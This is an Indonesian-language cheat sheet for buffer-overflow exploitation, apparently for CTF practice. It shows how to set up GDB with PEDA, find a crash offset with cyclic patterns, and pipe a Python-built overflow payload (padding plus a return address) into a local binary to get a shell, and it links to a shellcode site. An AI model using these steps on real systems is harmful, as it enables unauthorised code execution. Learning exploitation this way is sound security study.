Install GDB
sudo apt install gdb
git clone https://github.com/longld/peda.git ~/peda
untuk permanen gdb peda
tiap run gdb
:
echo "source ~/peda/peda.py" >> ~/.gdbinit
tapi jika tidak ingin permanen :
gdb
source ~/peda/peda.py
mencari buffer (jika) :
jalankan gdb peda
gdb
source ~/peda/peda.py
pattern create 100
misal didapat pattern :
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
lalu run program :
run
jika diminta input :
masukkan input blablabla : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
pokoknya sampai segmentation fault
cek offset :
pattern offset <memory-offset>
misal didapat offset 52, maka tinggal buat payloadnya
input payload
python -c "print 'a'*52+'\xef\xbe\xad\xde'" | ./(elf)
jika berupa running shell
(python -c "print 'a'*52+'\xef\xbe\xad\xde'";cat) | ./(elf)
*jika hex memory membentuk printable alphabet, maka tulis dengan alpahbet saja
web untuk mencari payload shell http://shell-storm.org/shellcode/
input in running gdb
(gdb) r <<< $(python -c "print '\xde\xad\xbe\xef'")
(gdb) r <<< $(python -c "print 0xdeadbeef")
*masih kacau (not recommended)
Cheat sheet
gdb
set disassembly intel
x main
x win
p main
define hook-stop
info register
x/10i $eip-8
x/36wx $esp
end
Objdump
objdump -x <file>
objdump -d <file>
objdump -t <file>